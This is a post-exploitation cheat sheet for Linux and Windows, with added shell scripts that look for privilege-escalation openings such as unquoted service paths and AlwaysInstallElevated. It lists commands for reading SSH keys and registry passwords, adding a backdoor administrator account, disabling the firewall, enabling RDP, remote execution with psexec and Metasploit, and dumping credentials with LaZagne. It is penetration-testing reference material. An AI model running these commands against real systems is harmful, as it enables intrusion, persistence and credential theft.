Post exploitation



  • Check for weak permissions:

Find setuid binaries:

$find / -perm -4000 -ls 2> /dev/null

Find files world writable:

$find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null

Find directories world writable:

$find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null
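
The three checks above combined into one sweep that can be pointed at any directory (a live root or a mounted image), as an added example that is not part of the original notes. The function name, the output format, the extra SUID_WRITABLE check and the sticky-bit filter for directories are my additions:

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): the setuid / world-writable
# checks wrapped into one sweep that takes a root directory ($1, default /),
# so it can be run against a scratch tree as well as a live box.
# Output: one finding per line, "<TYPE> <path>".
perm_sweep() {
  root=${1:-/}
  base=${root%/}            # "" when root is "/", so the prunes become /proc and /sys
  _find_pruned() {          # find below $root, skipping /proc and /sys (pseudo-fs noise)
    find "$root" -path "$base/proc" -prune -o -path "$base/sys" -prune -o \
         "$@" -print 2>/dev/null
  }
  # setuid binaries (-perm -4000: setuid bit set, whatever the other bits are)
  _find_pruned -type f -perm -4000 | sed 's/^/SUID /'
  # setuid binaries that are also group- or world-writable: overwrite = root shell
  _find_pruned -type f -perm -4000 \( -perm -0020 -o -perm -0002 \) | sed 's/^/SUID_WRITABLE /'
  # world-writable regular files (configs, scripts run by cron, ...)
  _find_pruned -type f -perm -0002 | sed 's/^/WWFILE /'
  # world-writable directories, ignoring sticky-bit ones such as /tmp (expected)
  _find_pruned -type d -perm -0002 ! -perm -1000 | sed 's/^/WWDIR /'
}

# Usage: perm_sweep /            (on the target)
#        perm_sweep /mnt/image   (on a mounted disk image)
[ $# -gt 0 ] && perm_sweep "$1"
```

The sweep only looks at mode bits: setgid binaries (`-perm -2000`) and file capabilities (`getcap -r /`) are separate checks, and a setuid binary on a filesystem mounted `nosuid` is listed but will not elevate.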

  • Look for interesting files:
$find / -name "*.txt" -ls 2> /dev/null
$find / -name "*.log" -ls 2> /dev/null

  • Check sudo (list what the current user may run first, then try for a root shell):
$sudo -l
$sudo su

  • Dump a PKCS#12 (.p12/.pfx) object (prompts for the import password; add -nodes to print the private key unencrypted):
$openssl pkcs12 -info -in $FILE

  • Show certs in PKCS#7 file:
$openssl pkcs7 -print_certs -inform DER -in $FILE
$openssl smime -verify -in signed.p7 -inform [pem|der]

Show keystore content:

$keytool -list -v -keystore keystore.jks

  • Commands for information gathering:

Processes:

$ps -ef

Interfaces and routes (on hosts without net-tools use ip addr and ip route):

$/sbin/ifconfig -a
$route -n

Cron jobs:

$cat /etc/crontab
$ls -la /var/spool/cron*/
$ls -la /etc/cron.d

NFS exports:

$cat /etc/exports

Distribution and release:

$cat /etc/redhat* /etc/debian* /etc/*release

Listening sockets and connections (ss -tanup on hosts without net-tools):

$netstat -tanu

Find users with a login shell (anything other than nologin/false; matching only /bin/sh and /bin/bash misses zsh and /usr/bin/* shells):

$grep -vE '/(nologin|false)$' /etc/passwd

Check bootup services (SysV init scripts; on systemd hosts also check the enabled units):

$ls /etc/rc*

SSH relationships and logins (private keys, known_hosts, authorized_keys; repeat for /root/.ssh and every home directory you can read):

$cat ~/.ssh/*




Windows post exploitation

Check filesystem:

Like "ls -la" in Linux (dir /a shows everything including hidden entries; /a:h shows only the hidden ones):

C:>dir /a
C:>dir /a:h

C:>dir /s /b C:\ | findstr /E "\.txt" > txt.txt
C:>dir /s /b C:\ | findstr /E "\.log" > log.txt
C:>dir /s /b C:\ | findstr /E "\.doc" > doc.txt
C:>dir /s /b C:\ | findstr /E "\.xls" > xls.txt
C:>dir /s /b C:\ | findstr /E "\.xml" > xml.txt

(findstr treats the pattern as a regex, so the dot must be escaped; /E anchors it at the end of the line.)

Check registry (plain-text passwords in string values; AlwaysInstallElevated is only exploitable when the value is 1 in both HKLM and HKCU):

C:>reg query HKLM /f password /t REG_SZ /s > hklm_password.txt
C:>reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt
C:>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt
C:>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt

Check scheduler:

C:>schtasks /query /fo LIST /v > schtasks.txt
C:>tasklist /SVC > tasklist.txt

Reboot the host (destructive, not a check; only when a change requires it):

C:>wmic os where Primary='TRUE' reboot

List hotfixes:

C:>wmic qfe

Write an NTFS alternate data stream (hides lion.txt behind myfile.txt; a plain dir does not show it, dir /r does):

C:>notepad myfile.txt:lion.txt

Logged-on / RDP sessions, sockets, firewall, service binary permissions, hosts overrides:

C:>quser > rdp.txt
C:>netstat -an > netstat.txt
C:>netsh firewall show config > firewall.txt
C:>icacls service.exe
C:>type C:\Windows\System32\drivers\etc\hosts

A service binary (or its directory) writable by the current user is a direct privilege escalation: replace the binary and restart the service.

Wmic commands (/node:<HOST> targets a remote machine; wmic is deprecated on recent Windows 10/11 builds, where PowerShell Get-CimInstance replaces it):

C:>wmic service get name,displayname,pathname,startmode > wmic_service.txt
C:>wmic /node:<HOST> qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect
C:>wmic /node:<HOST> product get name,version,vendor
C:>wmic process get Caption,CommandLine
C:>wmic printer list status
C:>wmic cpu get

wmic product is slow and makes Windows Installer run a consistency check (and possibly a repair) of every MSI package, which writes Application event log entries; read the Uninstall registry keys instead when noise matters.
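
Two offline checks over the captured files, as an added example that is not part of the original notes: the unquoted-service-path check over the service listing, and the AlwaysInstallElevated test over the two reg query outputs from the registry section above. It assumes the service list was captured with /format:csv (header Node,Name,PathName,StartMode), that the files were converted from UTF-16 to UTF-8 first, and the file names and sample contents are constructed for the demo:

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): offline checks over captured output.
# Assumed capture commands (run on the target):
#   wmic service get name,pathname,startmode /format:csv > wmic_service.csv
#   reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated  > reg_always.txt
#   reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt
# Redirected cmd output is UTF-16 with CRLF; convert before parsing:
#   iconv -f UTF-16 -t UTF-8 wmic_service.csv > wmic_service.utf8.csv

# 1. Services whose unquoted binary path contains a space (classic service privesc).
#    Prints "Name | StartMode | <exe path>" per candidate.
unquoted_service_paths() {
  tr -d '\r' < "$1" | awk -F',' '
    $1 == "Node" || NF < 4 { next }          # header and blank lines
    {
      name = $2; mode = $NF
      path = $3                               # PathName may itself contain commas
      for (i = 4; i < NF; i++) path = path "," $i
      if (substr(path, 1, 1) == "\"") next    # already quoted: not exploitable this way
      lp = tolower(path)
      n = index(lp, ".exe")
      exe = (n > 0) ? substr(path, 1, n + 3) : path   # drop service arguments
      if (index(exe, " ") == 0) next          # no space: resolved unambiguously
      if (lp ~ /^(c:\\windows\\|%systemroot%)/) next  # normally not user-writable
      printf "%s | %s | %s\n", name, mode, exe
    }'
}

# 2. AlwaysInstallElevated: exploitable only when BOTH HKLM and HKCU values are 0x1.
always_install_elevated() {
  tr -d '\r' < "$1" | awk '
    /^HKEY_LOCAL_MACHINE/ { hive = "HKLM" }
    /^HKEY_CURRENT_USER/  { hive = "HKCU" }
    $1 == "AlwaysInstallElevated" && $2 == "REG_DWORD" && tolower($3) == "0x1" { found[hive] = 1 }
    END {
      if (("HKLM" in found) && ("HKCU" in found))
        print "VULNERABLE: AlwaysInstallElevated=1 in HKLM and HKCU"
      else
        print "not exploitable (needs 0x1 in both HKLM and HKCU)"
    }'
}

# Constructed sample captures (not real output) so the script runs stand-alone.
sample_services() {
  cat <<'EOF'
Node,Name,PathName,StartMode
HOST1,Spooler,C:\Windows\System32\spoolsv.exe,Auto
HOST1,VulnSvc,C:\Program Files\Vuln App\service.exe -run,Auto
HOST1,GoodSvc,"C:\Program Files\Good App\service.exe" -run,Auto
HOST1,OtherSvc,C:\Tools\svc.exe,Manual
EOF
}
sample_reg() {
  cat <<'EOF'

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
EOF
}
demo() {
  svc=$(mktemp); reg=$(mktemp)
  sample_services > "$svc"; sample_reg > "$reg"
  unquoted_service_paths "$svc"
  always_install_elevated "$reg"
  rm -f "$svc" "$reg"
}
demo
```

For each path the first check reports, confirm with icacls that the current user can write to one of the intermediate directories (C:\Program Files\Vuln App\ or C:\Program Files\) and that the service can be restarted or the host rebooted; without both, the finding is not exploitable.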

List local accounts with their SIDs:

C:>wmic useraccount get name,sid,fullname

Net commands:

C:>net view
C:>net view \\host
C:>net share
C:>net use z: \\host\dir
C:>net users
C:>net user %username%
C:>net config rdr

Backdoor account (noisy: account creation and group membership changes are written to the Security event log):

C:>net user hax0r hax0r /add
C:>net localgroup administrators hax0r /add
C:>net localgroup "Remote Desktop users" hax0r /add

Check routing/network information:

C:>route print
C:>arp -a
C:>ipconfig /all

Show file attributes / permissions (cacls is deprecated; icacls replaces it):

C:>cacls cmd.exe
C:>attrib cmd.exe

List services (all, with their state):

C:>sc queryex type= service state= all

List running services only:

C:>net start

Current user (works on Win XP too, where whoami is not installed by default):

C:>echo %USERNAME%

  • Firewall (netsh firewall is the legacy XP/2003 syntax; netsh advfirewall is the one to use from Vista on)
C:>netsh firewall show state
C:>netsh firewall show config

Allow an inbound program or port (the rule names and ports below come from a tunnelling setup; pick your own):

C:>netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
C:>netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
C:>netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
C:>netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079

Disable firewall:

C:>netsh advfirewall set currentprofile state off

C:>netsh advfirewall set allprofiles state off

  • RDP

Enable RDP (fDenyTSConnections = 0), from a shell or from a meterpreter session:

C:>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
msf>reg queryval -k "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" -v TSEnabled
msf>reg setval -k "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" -v TSEnabled -t REG_DWORD -d 1

(TSEnabled is the legacy Windows 2000 Terminal Services value; on XP and later set fDenyTSConnections as above.)

Open the firewall for RDP (legacy netsh syntax) and start the service (service name TermService; display name "Terminal Services" on XP/2003, "Remote Desktop Services" from Vista on):

C:>netsh firewall set service type = remotedesktop mode = enable
C:>net start termservice
C:>net start "Terminal Services"

The service lives in a svchost.exe -k termsvcs process; that is how it shows up in tasklist /svc, not a command to run by hand.

Check the service on a remote host:

C:>tasklist /svc /S servername /U username /P password

Change RDP port (PortNumber under the RDP-Tcp WinStation key, default 3389 = 0xd3d; restart the service and open the new port in the firewall afterwards):

HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp  Value: PortNumber REG_DWORD = 3389

Remote Execution

From Linux (wmis from the wmi-client package; credentials as DOMAIN\USER%PASS):

$wmis -U DOMAIN\<USER>%<PASS> //<DC> cmd.exe /c <COMMAND>

From Windows (wmic, tasklist, taskkill and quser all accept a remote host; taskkill /FI needs a filter expression, not a bare name):

C:>wmic /node:$IP /user:administrator /password:mypassword bios get serialnumber
C:>tasklist.exe /S $IP /U domain\username
C:>tasklist.exe /S $IP /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running"
C:>taskkill.exe /S $IP /U domain\username /F /FI "IMAGENAME eq norton*"
C:>quser /SERVER:$IP

From sysinternals psexec (-s runs the command as SYSTEM, so in that case access to \\server\share is made with the machine account and the share must allow it):

C:>psexec -accepteula \\$IP -u DOMAIN\USER cmd.exe
C:>psexec \\$IP -s cmd /c copy \\server\share\file.ext c:\Temp
C:>psexec -s \\$IP c:\windows\system32\cscript.exe script.vbs arg1

Copy a file to the target host AND execute it:

C:>psexec -accepteula \\$IP -u DOMAIN\USER -c file.exe -w C:\temp

Authenticated WMI Exec via Powershell

msf > use exploit/windows/local/ps_wmi_exec
msf exploit(windows/local/ps_wmi_exec) > show options

Module options (exploit/windows/local/ps_wmi_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN                     no        Domain or machine name
   PASSWORD                   no        Password to authenticate with
   RHOSTS                     no        Target address range or CIDR identifier
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        Username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Universal

msf exploit(windows/local/ps_wmi_exec) >

  • On the same host but as another account (runas always prompts for the password; it cannot be passed on the command line):
C:>runas /user:administrator cmd
C:>runas /noprofile /user:DOMAIN\administrator cmd
C:>runas /profile /env /user:DOMAIN\<USER> "%windir%\system32\script.bat"

  • Windows-Exploit-Suggester (OBSOLETE)

WARNING: as of March 14 2017 the tool is no longer supported. It needs Python 2 with the xlrd module, downloads the Microsoft bulletin spreadsheet and compares it against the target's systeminfo output:

$python windows-exploit-suggester.py --update
$python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt

Tools for information gathering

  • Manual method (temp and recently opened files, favourites, hosts overrides):
C:>dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent
C:>dir %USERPROFILE%\Favorites
C:>type C:\Windows\System32\drivers\etc\hosts

  • LaZagne (recovers credentials stored by browsers, mail clients and other local software): all modules, browsers only, Firefox only:

C:>laZagne.exe all

C:>laZagne.exe browsers

C:>laZagne.exe browsers -firefox